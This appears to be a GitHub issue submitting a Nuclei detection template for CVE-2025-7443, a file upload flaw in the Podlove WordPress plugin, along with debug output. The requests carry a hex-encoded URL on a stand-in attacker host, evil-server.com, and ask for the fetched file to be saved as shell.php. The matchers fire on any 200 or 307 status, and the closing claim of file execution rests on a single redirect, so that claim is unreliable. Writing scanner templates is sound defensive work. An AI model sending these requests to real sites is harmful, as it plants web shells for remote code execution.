[TEMPLATE CONTRIBUTION]CVE-2025-7443

[zer0p0intvvv]

Is there an existing template for this?

• I have searched the existing templates.

Nuclei Template

id: wp-podlove-arbitrary-file-upload

info:
  name: Podlove Podcast Publisher - Arbitrary File Upload
  author: zer0p0int
  severity: high
  description: |
    Podlove Podcast Publisher plugin for WordPress contains an arbitrary file upload vulnerability in the image handling functionality.
    The vulnerability allows unauthenticated attackers to upload arbitrary files via specially crafted requests to the image cache endpoint.
    This can lead to remote code execution on the target server.
  tags: wordpress,wp-plugins,file-upload,rce

http:
  - method: GET
    path:
      - "{{BaseURL}}/?podlove_image_cache_url=687474703a2f2f6576696c2d7365727665722e636f6d2f746573742e706870&podlove_width=100&podlove_height=100&podlove_crop=0&podlove_file_name=shell.php"
      - "{{BaseURL}}/podlove/image/687474703a2f2f6576696c2d7365727665722e636f6d2f746573742e706870/100/100/0/shell.php"
    headers:
      User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
    redirects: true
    max-redirects: 3
    matchers-condition: or
    matchers:
      - type: status
        status:
          - 200
      - type: status
        status:
          - 307
      - type: word
        part: header
        words:
          - "Content-Type: image/"
        condition: or
      - type: word
        part: header
        words:
          - "Location: http://evil-server.com"
        condition: or
      - type: word
        part: body
        words:
          - "<?php"
          - "<?="
          - "eval("
          - "system("
        condition: or

Relevant dumped responses

GET /?podlove_image_cache_url=687474703a2f2f6576696c2d7365727665722e636f6d2f746573742e706870&podlove_width=100&podlove_height=100&podlove_crop=0&podlove_file_name=shell.php HTTP/1.1
Host: 192.168.3.14
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[DBG] [wp-podlove-arbitrary-file-upload] Dumped HTTP response http://192.168.3.14/?podlove_image_cache_url=687474703a2f2f6576696c2d7365727665722e636f6d2f746573742e706870&podlove_width=100&podlove_height=100&podlove_crop=0&podlove_file_name=shell.php

HTTP/1.1 404 Not Found
Connection: close
Transfer-Encoding: chunked
Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Fri, 07 Nov 2025 07:57:47 GMT
Server: nginx/1.27.0
Vary: RSC, Next-Router-State-Tree, Next-Router-Prefetch, Accept-Encoding
X-Powered-By: Next.js

<!DOCTYPE html><html lang="en-US" class="h-full" data-theme="light"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, viewport-fit=cover, user-scalable=no"/><link rel="stylesheet" href="/_next/static/css/21432139d29da21c.css" data-precedence="next"/><link rel="stylesheet" href="/_next/static/css/621c65b86bcfdced.css" data-precedence="next"/><link rel="stylesheet" href="/_next/static/css/7d3139ae547f7985.css" data-precedence="next"/><link rel="stylesheet" href="/_next/static/css/e3c08fb4605a062f.css" data-precedence="next"/><link rel="preload" as="script" fetchPriority="low" href="/_next/static/chunks/webpack-f871d985ecd54594.js"/><script src="/_next/static/chunks/fd9d1056-014bed05f3bb9932.js" async=""></script><script src="/_next/static/chunks/2117-facb83e7cbe5e185.js" async=""></script><script src="/_next/static/chunks/main-app-813cfbf9a5fdbcf0.js" async=""></script><script src="/_next/static/chunks/3014691f-7b8a12098efe735b.js" async=""></script><script src="/_next/static/chunks/396464d2-cf55f85ac46a5f44.js" async=""></script><script src="/_next/static/chunks/2444-04084a0cafe2ece9.js" async=""></script><script src="/_next/static/chunks/3949-07307cc475805761.js" async=""></script><script src="/_next/static/chunks/8054-2a7147af81892a01.js" async=""></script><script src="/_next/static/chunks/2155-837f5e5dcd672d0c.js" async=""></script><script src="/_next/static/chunks/9026-7a28f578710033ce.js" async=""></script><script src="/_next/static/chunks/app/layout-7d1eaf8453fb1b4e.js" async=""></script><meta name="robots" content="noindex"/><meta name="theme-color" content="#FFFFFF"/><meta name="mobile-web-app-capable" content="yes"/><meta name="apple-mobile-web-app-capable" content="yes"/><meta name="apple-mobile-web-app-status-bar-style" content="default"/><title>404: This page could not be found.</title><title>Dify</title><script src="/_next/static/chunks/polyfills-42372ed130431b0a.js" noModule=""></script></head><body class="h-full select-auto color-scheme" data-api-prefix="/console/api" data-pubic-api-prefix="/api" data-public-edition="SELF_HOSTED" data-public-sentry-dsn="" data-public-site-about="" data-public-text-generation-timeout-ms="60000" data-public-top-k-max-value="" data-public-indexing-max-segmentation-tokens-length=""><div style="font-family:system-ui,&quot;Segoe UI&quot;,Roboto,Helvetica,Arial,sans-serif,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;;height:100vh;text-align:center;display:flex;flex-direction:column;align-items:center;justify-content:center"><div><style>body{color:#000;background:#fff;margin:0}.next-error-h1{border-right:1px solid rgba(0,0,0,.3)}@media (prefers-color-scheme:dark){body{color:#fff;background:#000}.next-error-h1{border-right:1px solid rgba(255,255,255,.3)}}</style><h1 class="next-error-h1" style="display:inline-block;margin:0 20px 0 0;padding:0 23px 0 0;font-size:24px;font-weight:500;vertical-align:top;line-height:49px">404</h1><div style="display:inline-block"><h2 style="font-size:14px;font-weight:400;line-height:49px;margin:0">This page could not be found.</h2></div></div></div><script src="/_next/static/chunks/webpack-f871d985ecd54594.js" async=""></script><script>(self.__next_f=self.__next_f||[]).push([0]);self.__next_f.push([2,null])</script><script>self.__next_f.push([1,"1:HL[\"/_next/static/css/21432139d29da21c.css\",\"style\"]\n2:HL[\"/_next/static/css/621c65b86bcfdced.css\",\"style\"]\n3:HL[\"/_next/static/css/7d3139ae547f7985.css\",\"style\"]\n4:HL[\"/_next/static/css/e3c08fb4605a062f.css\",\"style\"]\n"])</script><script>self.__next_f.push([1,"5:I[12846,[],\"\"]\n7:I[4707,[],\"\"]\n8:I[36423,[],\"\"]\n9:I[37971,[\"3665\",\"static/chunks/3014691f-7b8a12098efe735b.js\",\"9119\",\"static/chunks/396464d2-cf55f85ac46a5f44.js\",\"2444\",\"static/chunks/2444-04084a0cafe2ece9.js\",\"3949\",\"static/chunks/3949-07307cc475805761.js\",\"8054\",\"static/chunks/8054-2a7147af81892a01.js\",\"2155\",\"static/chunks/2155-837f5e5dcd672d0c.js\",\"9026\",\"static/chunks/9026-7a28f578710033ce.js\",\"3185\",\"static/chunks/app/layout-7d1eaf8453fb1b4e.js\"],\"default\"]\na:I[41403,[\"3665\",\"static/chunks/3014691f-7b8a12098efe735b.js\",\"9119\",\"static/chunks/396464d2-cf55f85ac46a5f44.js\",\"2444\",\"static/chunks/2444-04084a0cafe2ece9.js\",\"3949\",\"static/chunks/3949-07307cc475805761.js\",\"8054\",\"static/chunks/8054-2a7147af81892a01.js\",\"2155\",\"static/chunks/2155-837f5e5dcd672d0c.js\",\"9026\",\"static/chunks/9026-7a28f578710033ce.js\",\"3185\",\"static/chunks/app/layout-7d1eaf8453fb1b4e.js\"],\"default\"]\nb:I[64129,[\"3665\",\"static/chunks/3014691f-7b8a12098efe735b.js\",\"9119\",\"static/chunks/396464d2-cf55f85ac46a5f44.js\",\"2444\",\"static/chunks/2444-04084a0cafe2ece9.js\",\"3949\",\"static/chunks/3949-07307cc475805761.js\",\"8054\",\"static/chunks/8054-2a7147af81892a01.js\",\"2155\",\"static/chunks/2155-837f5e5dcd672d0c.js\",\"9026\",\"static/chunks/9026-7a28f578710033ce.js\",\"3185\",\"static/chunks/app/layout-7d1eaf8453fb1b4e.js\"],\"TanstackQueryIniter\"]\nc:I[98418,[\"3665\",\"static/chunks/3014691f-7b8a12098efe735b.js\",\"9119\",\"static/chunks/396464d2-cf55f85ac46a5f44.js\",\"2444\",\"static/chunks/2444-04084a0cafe2ece9.js\",\"3949\",\"static/chunks/3949-07307cc475805761.js\",\"8054\",\"static/chunks/8054-2a7147af81892a01.js\",\"2155\",\"static/chunks/2155-837f5e5dcd672d0c.js\",\"9026\",\"static/chunks/9026-7a28f578710033ce.js\",\"3185\",\"static/chunks/app/layout-7d1eaf8453fb1b4e.js\"],\"default\"]\nd:I[59990,[\"3665\",\"static/chunks/3014691f-7b8a12098efe735b.js\",\"9119\",\"static/chunks/396464d2-cf55f85ac46a5f44.js\",\"2444\",\"static/chunks/2444-04084a0cafe2ece9.js\",\"3949\",\"static/chunks/3949-07307cc475805761.js\",\"8054\",\"static/chunks/8054-2a7147af81892a01.js\",\"2155\",\"static/chunks/2155-837f5e5dcd672d0c"])</script><script>self.__next_f.push([1,".js\",\"9026\",\"static/chunks/9026-7a28f578710033ce.js\",\"3185\",\"static/chunks/app/layout-7d1eaf8453fb1b4e.js\"],\"ToastProvider\"]\n13:I[61060,[],\"\"]\ne:{\"fontFamily\":\"system-ui,\\\"Segoe UI\\\",Roboto,Helvetica,Arial,sans-serif,\\\"Apple Color Emoji\\\",\\\"Segoe UI Emoji\\\"\",\"height\":\"100vh\",\"textAlign\":\"center\",\"display\":\"flex\",\"flexDirection\":\"column\",\"alignItems\":\"center\",\"justifyContent\":\"center\"}\nf:{\"display\":\"inline-block\",\"margin\":\"0 20px 0 0\",\"padding\":\"0 23px 0 0\",\"fontSize\":24,\"fontWeight\":500,\"verticalAlign\":\"top\",\"lineHeight\":\"49px\"}\n10:{\"display\":\"inline-block\"}\n11:{\"fontSize\":14,\"fontWeight\":400,\"lineHeight\":\"49px\",\"margin\":0}\n14:[]\n"])</script><script>self.__next_f.push([1,"0:[\"$\",\"$L5\",null,{\"buildId\":\"qJak2oWJ3DjrvlDSy50D4\",\"assetPrefix\":\"\",\"urlParts\":[\"\",\"test.php\"],\"initialTree\":[\"\",{\"children\":[\"/_not-found\",{\"children\":[\"__PAGE__\",{}]}]},\"$undefined\",\"$undefined\",true],\"initialSeedData\":[\"\",{\"children\":[\"/_not-found\",{\"children\":[\"__PAGE__\",{},[[\"$L6\",[[\"$\",\"title\",null,{\"children\":\"404: This page could not be found.\"}],[\"$\",\"div\",null,{\"style\":{\"fontFamily\":\"system-ui,\\\"Segoe UI\\\",Roboto,Helvetica,Arial,sans-serif,\\\"Apple Color Emoji\\\",\\\"Segoe UI Emoji\\\"\",\"height\":\"100vh\",\"textAlign\":\"center\",\"display\":\"flex\",\"flexDirection\":\"column\",\"alignItems\":\"center\",\"justifyContent\":\"center\"},\"children\":[\"$\",\"div\",null,{\"children\":[[\"$\",\"style\",null,{\"dangerouslySetInnerHTML\":{\"__html\":\"body{color:#000;background:#fff;margin:0}.next-error-h1{border-right:1px solid rgba(0,0,0,.3)}@media (prefers-color-scheme:dark){body{color:#fff;background:#000}.next-error-h1{border-right:1px solid rgba(255,255,255,.3)}}\"}}],[\"$\",\"h1\",null,{\"className\":\"next-error-h1\",\"style\":{\"display\":\"inline-block\",\"margin\":\"0 20px 0 0\",\"padding\":\"0 23px 0 0\",\"fontSize\":24,\"fontWeight\":500,\"verticalAlign\":\"top\",\"lineHeight\":\"49px\"},\"children\":\"404\"}],[\"$\",\"div\",null,{\"style\":{\"display\":\"inline-block\"},\"children\":[\"$\",\"h2\",null,{\"style\":{\"fontSize\":14,\"fontWeight\":400,\"lineHeight\":\"49px\",\"margin\":0},\"children\":\"This page could not be found.\"}]}]]}]}]],null],null],null]},[null,[\"$\",\"$L7\",null,{\"parallelRouterKey\":\"children\",\"segmentPath\":[\"children\",\"/_not-found\",\"children\"],\"error\":\"$undefined\",\"errorStyles\":\"$undefined\",\"errorScripts\":\"$undefined\",\"template\":[\"$\",\"$L8\",null,{}],\"templateStyles\":\"$undefined\",\"templateScripts\":\"$undefined\",\"notFound\":\"$undefined\",\"notFoundStyles\":\"$undefined\"}]],null]},[[[[\"$\",\"link\",\"0\",{\"rel\":\"stylesheet\",\"href\":\"/_next/static/css/21432139d29da21c.css\",\"precedence\":\"next\",\"crossOrigin\":\"$undefined\"}],[\"$\",\"link\",\"1\",{\"rel\":\"stylesheet\",\"href\":\"/_next/static/css/621c65b86bcfdced.css\",\"precedence\":\"next\",\"crossOrigin\":\"$undefined\"}],[\"$\",\"link\",\"2\",{\"rel\":\"stylesheet\",\"href\":\"/_next/static/css/7d3139ae547f7985.css\",\"precedence\":\"next\",\"crossOrigin\":\"$undefined\"}],[\"$\",\"link\",\"3\",{\"rel\":\"stylesheet\",\"href\":\"/_next/static/css/e3c08fb4605a062f.css\",\"precedence\":\"next\",\"crossOrigin\":\"$undefined\"}]],[\"$\",\"html\",null,{\"lang\":\"en-US\",\"className\":\"h-full\",\"data-theme\":\"light\",\"children\":[[\"$\",\"head\",null,{\"children\":[[\"$\",\"meta\",null,{\"name\":\"theme-color\",\"content\":\"#FFFFFF\"}],[\"$\",\"meta\",null,{\"name\":\"mobile-web-app-capable\",\"content\":\"yes\"}],[\"$\",\"meta\",null,{\"name\":\"apple-mobile-web-app-capable\",\"content\":\"yes\"}],[\"$\",\"meta\",null,{\"name\":\"apple-mobile-web-app-status-bar-style\",\"content\":\"default\"}]]}],[\"$\",\"body\",null,{\"className\":\"h-full select-auto color-scheme\",\"data-api-prefix\":\"/console/api\",\"data-pubic-api-prefix\":\"/api\",\"data-public-edition\":\"SELF_HOSTED\",\"data-public-support-mail-login\":\"$undefined\",\"data-public-sentry-dsn\":\"\",\"data-public-maintenance-notice\":\"$undefined\",\"data-public-site-about\":\"\",\"data-public-text-generation-timeout-ms\":\"60000\",\"data-public-top-k-max-value\":\"\",\"data-public-indexing-max-segmentation-tokens-length\":\"\",\"children\":[\"$\",\"$L9\",null,{\"children\":[\"$\",\"$La\",null,{\"children\":[\"$\",\"$Lb\",null,{\"children\":[\"$\",\"$Lc\",null,{\"locale\":\"en-US\",\"children\":[\"$\",\"$Ld\",null,{\"children\":[\"$\",\"$L7\",null,{\"parallelRouterKey\":\"children\",\"segmentPath\":[\"children\"],\"error\":\"$undefined\",\"errorStyles\":\"$undefined\",\"errorScripts\":\"$undefined\",\"template\":[\"$\",\"$L8\",null,{}],\"templateStyles\":\"$undefined\",\"templateScripts\":\"$undefined\",\"notFound\":[[\"$\",\"title\",null,{\"children\":\"404: This page could not be found.\"}],[\"$\",\"div\",null,{\"style\":\"$e\",\"children\":[\"$\",\"div\",null,{\"children\":[[\"$\",\"style\",null,{\"dangerouslySetInnerHTML\":{\"__html\":\"body{color:#000;background:#fff;margin:0}.next-error-h1{border-right:1px solid rgba(0,0,0,.3)}@media (prefers-color-scheme:dark){body{color:#fff;background:#000}.next-error-h1{border-right:1px solid rgba(255,255,255,.3)}}\"}}],[\"$\",\"h1\",null,{\"className\":\"next-error-h1\",\"style\":\"$f\",\"children\":\"404\"}],[\"$\",\"div\",null,{\"style\":\"$10\",\"children\":[\"$\",\"h2\",null,{\"style\":\"$11\",\"children\":\"This page could not be found.\"}]}]]}]}]],\"notFoundStyles\":[]}]}]}]}]}]}]}]]}]],null],null],\"couldBeIntercepted\":false,\"initialHead\":[[\"$\",\"meta\",null,{\"name\":\"robots\",\"content\":\"noindex\"}],\"$L12\"],\"globalErrorComponent\":\"$13\",\"missingSlots\":\"$W14\"}]\n"])</script><script>self.__next_f.push([1,"12:[[\"$\",\"meta\",\"0\",{\"name\":\"viewport\",\"content\":\"width=device-width, initial-scale=1, maximum-scale=1, viewport-fit=cover, user-scalable=no\"}],[\"$\",\"meta\",\"1\",{\"charSet\":\"utf-8\"}],[\"$\",\"title\",\"2\",{\"children\":\"Dify\"}]]\n6:null\n"])</script></body></html>
[DBG] [wp-podlove-arbitrary-file-upload] Dumped HTTP response http://192.168.3.14/?podlove_image_cache_url=687474703a2f2f6576696c2d7365727665722e636f6d2f746573742e706870&podlove_width=100&podlove_height=100&podlove_crop=0&podlove_file_name=shell.php

HTTP/1.1 307 Temporary Redirect
Connection: close
Content-Type: text/html; charset=UTF-8
Date: Fri, 07 Nov 2025 07:57:42 GMT
Location: http://evil-server.com/test.php
Server: Apache/2.4.56 (Debian)
X-Powered-By: PHP/8.0.30
Content-Length: 0

[wp-podlove-arbitrary-file-upload:status-2] [http] [high] http://192.168.3.14/?podlove_image_cache_url=687474703a2f2f6576696c2d7365727665722e636f6d2f746573742e706870&podlove_width=100&podlove_height=100&podlove_crop=0&podlove_file_name=shell.php
[wp-podlove-arbitrary-file-upload:word-4] [http] [high] http://192.168.3.14/?podlove_image_cache_url=687474703a2f2f6576696c2d7365727665722e636f6d2f746573742e706870&podlove_width=100&podlove_height=100&podlove_crop=0&podlove_file_name=shell.php

Because of the 307 error, any malicious URL can be used to download and execute files.

Anything else?

https://plugins.trac.wordpress.org/browser/podlove-podcasting-plugin-for-wordpress/tags/4.2.6/lib/model/image.php#L465
https://plugins.trac.wordpress.org/changeset/3364994/